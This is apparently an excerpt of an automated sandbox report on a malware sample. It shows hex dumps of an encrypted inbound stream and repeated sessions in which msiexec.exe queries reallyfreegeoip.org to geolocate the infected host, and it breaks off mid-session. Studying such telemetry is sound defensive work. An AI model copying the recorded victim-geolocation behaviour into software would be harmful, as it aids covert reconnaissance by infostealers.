                                                                                                                                                        Data Ascii: UmE_2%kUh*^wi^U\fU_@?y!WPe_.{;(T'b5aMlbl~{fA~=:?Ws,%&ZP1=@/r@w`N2]=VVHoRO&FE3|7okY)R)yM"|6eM%;i{+hLI3vR/h+V
                                                                                                                                                        2024-12-19 07:19:33 UTC1390INData Raw: 78 71 3d ee 5f 0a cc 04 62 d7 cd ec f4 d0 5a 3e 12 68 7f 39 b4 3e 23 55 6d 1f c4 d1 50 9f e8 79 3e b0 67 e3 d4 33 79 de 28 af bc 1d af c2 90 02 be 74 91 d4 f9 d4 59 b0 c5 d2 69 34 46 55 fc 95 ec 62 c2 01 35 6e 37 14 d3 b9 d3 97 e6 01 58 f5 6e e1 a9 fc 8d d7 d6 8a 25 69 b3 4c fe 51 aa 6c a5 ed 04 ae cd ef f2 c7 11 26 d8 22 7a 0f 99 cd 07 9b c2 aa 62 b1 a4 9c af 14 7b ab 39 53 fd 2e 85 ba c5 d4 1d 26 f6 41 59 38 24 07 73 e1 48 68 42 6e 63 74 cd d7 21 ef 34 1e 78 53 81 59 e9 50 78 69 c0 50 14 54 12 48 d6 a6 ea 15 64 34 22 45 57 ff 24 2c ac dc 1f 4e 28 d6 c6 20 29 b8 94 5a e1 d9 ef a9 c7 8a 2b 3a 8e 5f 24 db c6 e4 3a 1c 33 3b 66 aa c4 76 70 6a 9c 16 31 9a f3 29 fc ca 79 73 fa 54 66 9a c8 ff d7 db 14 82 9c 20 58 be 81 27 75 00 18 1f 5f 06 78 bf 13 4a f0 be c9
                                                                                                                                                        Data Ascii: xq=_bZ>h9>#UmPy>g3y(tYi4FUb5n7Xn%iLQl&"zb{9S.&AY8$sHhBnct!4xSYPxiPTHd4"EW$,N( )Z+:_$:3;fvpj1)ysTf X'u_xJ
                                                                                                                                                        2024-12-19 07:19:33 UTC1390INData Raw: 6e 0f 56 80 42 99 53 5b 9b da 60 11 ca 8e 23 8e 1c b3 51 67 f0 b9 a0 5c da f7 34 09 2a 81 33 28 57 aa 83 a7 f4 2d fd cc 9c ff c9 22 59 9e f2 00 af 43 9b 74 b2 20 71 b6 ba b1 a0 3c d7 bf 08 14 89 43 4e e8 25 2c fb 95 5e 96 35 ac f0 8b 39 bf 80 49 16 a7 2c 3e 15 b0 7b 08 ab 35 ec 63 d0 45 92 a3 69 bd cb ec 49 4a 66 f2 ea 44 23 a3 ce 3b 2c 6d 0f fc b8 63 ae cb 46 4b b4 57 f4 27 6c 1e 2f 0f 35 df 3d ca fd b1 1f 99 15 98 89 32 3b 0f 1e 8e 66 82 b0 bd c2 08 dd 2d bb 4a ae d4 bd c4 31 0d ea 43 a4 54 1e 82 c3 95 82 a6 38 ed dc dd d8 a5 f4 14 7b 3e 76 07 86 65 cf 88 9f 28 b2 12 d6 f1 33 62 9f 46 3b 22 cc 58 04 a9 02 b5 7c 01 e9 06 40 dd 13 13 fe 59 2f 0e ea 00 e2 5e bd 90 f0 63 04 9b 6a bb 60 cd b3 9f bc 89 02 bb 81 d0 c9 40 30 38 8e 94 8d 33 e5 3a a9 07 54 1d ff
                                                                                                                                                        Data Ascii: nVBS[`#Qg\4*3(W-"YCt q<CN%,^59I,>{5cEiIJfD#;,mcFKW'l/5=2;f-J1CT8{>ve(3bF;"X|@Y/^cj`@083:T
                                                                                                                                                        2024-12-19 07:19:33 UTC1390INData Raw: 98 66 93 2d 14 89 fc f1 e6 2c 48 5b ab 4b 48 a4 9d 03 4d ae 84 3d a3 91 d4 38 24 da d7 8f ba 33 b7 8f 98 c3 18 f8 07 34 f0 a1 88 f1 73 df bc c4 ce e5 b8 d4 f7 25 66 1d 6a ce 59 b8 74 97 65 af 13 be 40 dc bc 14 8c 1e 38 0c c8 96 78 40 d7 f3 26 7f 6e c4 19 41 9a fa 66 b3 1e f9 12 66 c0 35 c3 14 57 ad 94 d6 8e 39 f0 44 1f fb fb 1f 80 c9 0d 43 69 12 3a fe 55 90 73 44 06 19 4e 36 d7 eb 49 0b 95 25 4b 24 81 59 1f d0 e3 42 33 78 06 29 f4 04 48 9f b0 2f c2 01 13 3c c9 14 01 97 bc c8 b5 84 86 bc ff 57 dd ef fe 7d ae 07 e9 ab 35 d1 da 22 5e c7 e8 95 38 8f e7 81 93 cf e3 f7 08 ea bb 1a 81 7c 79 9b ea 9c c8 f0 d8 41 b8 25 bf a6 66 24 55 83 f4 88 9c 40 a2 12 ef 7e 22 32 c3 d8 17 bc ea 8f 61 07 f0 53 66 45 8f 8d 2f 8c e3 a4 34 c5 27 40 55 c9 34 97 2d 16 70 80 05 f4 af
                                                                                                                                                        Data Ascii: f-,H[KHM=8$34s%fjYte@8x@&nAff5W9DCi:UsDN6I%K$YB3x)H/<W}5"^8|yA%f$U@~"2aSfE/4'@U4-p
                                                                                                                                                        2024-12-19 07:19:33 UTC1390INData Raw: 08 1f 7f ba b2 2d a5 dc c5 65 05 a1 06 79 fd 3a 6a f3 f3 8b 7d 23 83 cb 3a bb e5 e3 00 a9 45 dc da 35 37 d9 88 85 71 9f 84 43 96 08 dc 45 9b 23 99 fd cd a0 c3 3f fb 51 44 fc 9d b8 b9 bc cf 67 09 81 34 5f 1d b4 e1 8e db cb 48 49 2a 57 53 dd 08 c9 51 e6 28 dd 28 7f 70 1a 92 02 d7 c8 a8 ea 0b d2 b5 99 de 08 ad eb 44 c3 4f b8 89 95 76 b3 40 95 e0 15 59 12 2c d3 20 d4 b6 92 c3 6d 7e 88 3e ad 36 6b f4 b4 42 f1 70 42 3a 71 94 09 04 c6 d5 00 8d c5 c2 30 7c b1 7b 89 c6 ed c3 cb b0 a8 ec 9d e2 f5 b0 dd d6 0f 5f 70 90 f8 a7 f1 9a 38 20 5f 16 30 92 ab 0f 11 3e ef 86 6f 1b 0b aa d6 0e 92 21 df 6d df f0 33 7a cf 77 b0 1d ea 27 72 e3 12 d7 5f d7 2a b7 4e 99 29 d9 13 f8 54 41 a1 75 35 11 bd 68 79 f7 e2 f1 e3 2c ad e2 47 89 1c e1 b3 69 2e c0 1b fa e7 76 12 8a 9c 12 2c 34
                                                                                                                                                        Data Ascii: -ey:j}#:E57qCE#?QDg4_HI*WSQ((pDOv@Y, m~>6kBpB:q0|{_p8 _0>o!m3zw'r_*N)TAu5hy,Gi.v,4
                                                                                                                                                        2024-12-19 07:19:33 UTC1390INData Raw: 06 ff 84 59 01 70 91 59 dd 2d 11 e8 92 e9 d6 40 d9 27 ec cd 39 3a 5b ed ce 06 65 62 3f bb 2e ff 43 47 51 31 9b bc 36 44 08 32 e1 88 ce 15 d9 81 bd e4 87 2e 7b 01 a0 59 1f 0d 3d ea 66 e3 cb f9 2c 5c e0 04 f0 ca 66 fe aa 47 2d c1 02 4d 84 a8 ce 09 f8 9d ec bf 7c 6f 9e 8c 99 31 88 a6 0c 9a 89 10 79 aa c1 65 66 53 f6 0e 33 e8 21 c9 44 6e ee cb 7f 24 44 30 91 92 cb 70 44 16 cb 23 73 70 d4 a8 90 6e 39 01 ff b5 ba 65 3a 07 5e 44 bb 3f 58 c0 b0 68 d8 a3 1b dd 5c d0 0f 73 8c 99 a8 e8 39 30 c7 b1 68 0f 52 02 de fe 64 76 0d 35 40 f8 be a8 9d 2b ee 31 06 90 7d 32 97 01 47 17 b9 75 14 61 44 49 e7 35 20 c0 ff f7 16 b4 4d a8 4d 52 fd 5f 9f 4f 1a fc 13 a7 96 f7 83 ab d1 7f 71 55 d9 45 ab e1 6d ac 80 d3 0d d2 17 ce 3c aa 3a 0c 61 3a a5 b7 fc e6 cd 3f ab 49 20 65 25 6e a0
                                                                                                                                                        Data Ascii: YpY-@'9:[eb?.CGQ16D2.{Y=f,\fG-M|o1yefS3!Dn$D0pD#spn9e:^D?Xh\s90hRdv5@+1}2GuaDI5 MMR_OqUEm<:a:?I e%n
                                                                                                                                                        2024-12-19 07:19:33 UTC1390INData Raw: 5c 55 75 0b 35 15 97 36 be 70 a7 e8 5e a9 df 90 28 58 f3 61 a7 ee da a5 66 51 46 f8 47 ff 87 db d0 06 52 ed da 6b 97 f2 b9 cc 57 79 49 86 84 34 24 37 48 2a b0 b0 6b 83 c9 0a 6e 5d ea cf b5 e2 14 c8 93 89 11 f1 ef 4e 43 ed fd 40 3e ec fb 9e 0e 9b 4f 39 78 63 0c 7b a8 07 d2 38 d0 4c 2c c0 be a1 d0 6c c3 d5 c5 a0 ea b3 f7 45 33 7c 13 06 0e f3 83 d8 20 71 6e 3b 77 2b a4 d6 16 22 ab 8f 81 0c ef 68 14 73 2e 16 25 a9 e7 77 33 26 94 40 f6 22 f1 5b 5f d6 7e 23 b7 77 e2 70 7d 77 57 ab 3e 3e 52 00 b4 47 46 9f 2f cb 67 79 b4 28 53 40 bf ee 17 b6 90 e3 e5 52 cd b8 f0 66 42 3a 8b 03 01 9a 2f 4d 23 55 c7 7c e2 75 1f 44 dc 7b 08 fa cc 03 16 7d 24 2e 5f e5 24 08 4d 69 72 fa 4d c7 07 2f dd 59 b8 cd cc 29 81 e8 87 48 37 e1 02 f3 53 ef ee 80 f9 1d 76 02 f8 7e b5 0b 89 2a 30
                                                                                                                                                        Data Ascii: \Uu56p^(XafQFGRkWyI4$7H*kn]NC@>O9xc{8L,lE3| qn;w+"hs.%w3&@"[_~#wp}wW>>RGF/gy(S@RfB:/M#U|uD{}$._$MirM/Y)H7Sv~*0
                                                                                                                                                        2024-12-19 07:19:33 UTC1390INData Raw: 7a 3d 46 15 0d 60 c7 2c d5 36 6e 13 68 e5 76 21 e3 3e 08 ae 25 92 4b f2 42 54 1b ee 41 03 3f c9 69 a4 8d f9 15 3f 41 3d 54 46 ed 63 af ac dc 1f 5f 0a b9 97 5e 17 bc bc 60 c9 12 e9 a9 13 f5 c2 12 ba 55 24 c0 c4 b9 00 34 51 3f 18 9b 1a 76 74 19 20 68 06 90 9c e0 8e 5f 71 73 9b 53 5f 17 a7 31 dd cd e0 83 9e 08 26 55 ad 7b 62 8d 86 0f 7a 2f 69 a9 61 0d ec ad b9 d9 6e f6 4e 39 16 e4 1d 8c 2f 59 26 39 2a 95 e8 40 8e ab 25 3e 0f 0a cd 4a 85 0d db 26 0a e6 ac 17 84 4e 0d 65 37 55 bb c9 7f 87 e2 bf 8c 1d 2d 8e ea e3 db bf 7b 32 03 30 04 6e cc 5b 02 40 0c bf de 4b 81 ac f7 d2 5c 23 19 00 e4 5b f7 4d 3a 3f b3 15 c3 da ae 52 78 fd bc 85 8f 08 01 ba 49 50 64 8e 66 a9 58 e8 ce b6 da d5 9c 0e 60 69 4a 01 c5 80 5b 01 30 21 b2 08 d3 65 7f e1 66 f2 2f 6c 5f 4a 52 1e c4 04
                                                                                                                                                        Data Ascii: z=F`,6nhv!>%KBTA?i?A=TFc_^`U$4Q?vt h_qsS_1&U{bz/ianN9/Y&9*@%>J&Ne7U-{20n[@K\#[M:?RxIPdfX`iJ[0!ef/l_JR


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        2192.168.2.449825172.67.177.1344432720C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-19 07:19:37 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        2024-12-19 07:19:37 UTC880INHTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 19 Dec 2024 07:19:37 GMT
                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                        Content-Length: 362
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                        Age: 581546
                                                                                                                                                        Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=No3j0qXYXdII1Lx7D8llIm14l5J%2FXNP8%2Fztj8LqyHpKxlXStvvpsh%2Brm8TA8c3X5b6Zv%2FfYSXerWvG2A9KT4DOc9zfzNTqG%2FmHoxaO3TWlbSJTM3cLTRCj7E2UUTIByZvPyNqfDt"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 8f45a01c9bf67283-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1875&min_rtt=1867&rtt_var=718&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1506707&cwnd=244&unsent_bytes=0&cid=6795cd7fd8ed15c1&ts=482&x=0"
                                                                                                                                                        2024-12-19 07:19:37 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        3192.168.2.449831172.67.177.1344432720C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-19 07:19:39 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                        2024-12-19 07:19:40 UTC876INHTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 19 Dec 2024 07:19:39 GMT
                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                        Content-Length: 362
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                        Age: 581548
                                                                                                                                                        Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YSQLzADwoYG%2FzfYLddO%2FQCDiTji5M5WVbeZDJyughjMRzttgGH4VL4DKcTYYQIOkTXPMJMAfGVglWLj4vPe4bvRpN9UNvAt88czZw6Oyccm%2Fy2htrBxCVSpX49xymzeBUFsQ4jU7"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 8f45a02ace4fc407-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1486&min_rtt=1481&rtt_var=566&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1913499&cwnd=197&unsent_bytes=0&cid=26f552744cd99ece&ts=448&x=0"
                                                                                                                                                        2024-12-19 07:19:40 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        4192.168.2.449843172.67.177.1344432720C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-19 07:19:42 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                        2024-12-19 07:19:43 UTC882INHTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 19 Dec 2024 07:19:42 GMT
                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                        Content-Length: 362
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                        Age: 581551
                                                                                                                                                        Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IbDCF2T4eY2tVt4iq3dNONT6QdUvMi2JvrICJCY2QJ4VIsxfbtZiyl7uk4D0f1Dyi101TC%2B9jL57nFFYLRFe2i5951%2F1Fypt4BqUX8VCUhPUUsSBAHj%2ByXmKnHAI%2Fh6d%2Fpflo%2FB9"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 8f45a03ccff6440b-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1597&min_rtt=1597&rtt_var=600&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1822721&cwnd=227&unsent_bytes=0&cid=2c83656431f6850f&ts=448&x=0"
                                                                                                                                                        2024-12-19 07:19:43 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        5192.168.2.449850172.67.177.1344432720C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-19 07:19:45 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                        2024-12-19 07:19:45 UTC880INHTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 19 Dec 2024 07:19:45 GMT
                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                        Content-Length: 362
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                        Age: 581554
                                                                                                                                                        Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OuWKX8ppP9sjpg1%2F4b0oVwhpAUDFxtrMLNOG4k974WTY8D33ucZACKGVyMgFvasT4srvW9srUyFq0EeM0m2j8xBmWynG%2Fdjo%2FMJ9waLkw1RcpWsu5W7JuMtlFyZgkBt7Ma%2Bmc2%2Bm"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 8f45a04edb71c484-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1522&min_rtt=1520&rtt_var=574&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1898569&cwnd=248&unsent_bytes=0&cid=9a03c7d8d0413bb7&ts=452&x=0"
                                                                                                                                                        2024-12-19 07:19:45 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        6192.168.2.449857172.67.177.1344432720C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-19 07:19:48 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        2024-12-19 07:19:48 UTC878INHTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 19 Dec 2024 07:19:48 GMT
                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                        Content-Length: 362
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                        Age: 581557
                                                                                                                                                        Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pZ7eD5BLI1I4c%2B2R02VEzlNr5qA0V0L55FV%2BTgPGu4Re6134nL7Wj7VDLcolC3x8NMDjLaUmJCn4elVz1mb%2F6fDY%2FutIzU135GZR8ES5yGYqnVnJLhg5ZFL4TsjP6paBizeQMTaV"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 8f45a060d9d65e79-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1885&min_rtt=1877&rtt_var=721&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1498973&cwnd=222&unsent_bytes=0&cid=ea217b7165b73cb2&ts=456&x=0"
                                                                                                                                                        2024-12-19 07:19:48 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        7192.168.2.449869172.67.177.1344432720C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-19 07:19:51 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        2024-12-19 07:19:51 UTC876INHTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 19 Dec 2024 07:19:51 GMT
                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                        Content-Length: 362
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                        Age: 581560
                                                                                                                                                        Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6zUGb0NAlIpnx0X8HO7n6iPb9rrPTqNnnoDy56nN4NduJC24EkhxX8RRRsWlSGb0m5GvINcNhyQrzr3I8j%2F7Llq4kP%2FsngBwevwNH5qxUOR4lLX%2FYR8Ro5YTJbK6aKJ8NtYLc6aw"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 8f45a0739e4dc413-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
